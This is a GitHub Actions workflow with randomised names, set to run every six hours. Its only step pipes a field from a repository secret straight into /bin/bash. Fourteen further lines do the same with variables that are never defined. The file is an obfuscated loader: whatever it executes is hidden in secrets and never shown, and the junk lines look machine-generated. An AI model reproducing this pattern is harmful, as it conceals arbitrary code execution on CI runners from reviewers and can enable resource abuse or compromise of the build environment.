name: zhaojinan7890

on:
  workflow_dispatch:
  schedule:
    - cron: '53 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhaojinan7890
        env:
          ux1608: ${{ secrets.ux1608 }}
        run: |
          echo $ux1608 | jq -r .lxa27298 | /bin/bash
          echo $sgwkl962 | jq -r .igab51 | /bin/bash
          echo $ebayb9 | jq -r .k9 | /bin/bash
          echo $uitzb0830 | jq -r .pa345 | /bin/bash
          echo $z58392 | jq -r .tfsgs40823 | /bin/bash
          echo $gw48840 | jq -r .nb3411 | /bin/bash
          echo $gy5 | jq -r .uw76323 | /bin/bash
          echo $p7 | jq -r .m24 | /bin/bash
          echo $hy9 | jq -r .qpczy5 | /bin/bash
          echo $kgzql7 | jq -r .qerm111 | /bin/bash
          echo $t1264 | jq -r .nu72 | /bin/bash
          echo $hfvhp75624 | jq -r .k2 | /bin/bash
          echo $y008 | jq -r .u7832 | /bin/bash
          echo $hag336 | jq -r .j4821 | /bin/bash
          echo $l17 | jq -r .utcm2013 | /bin/bash

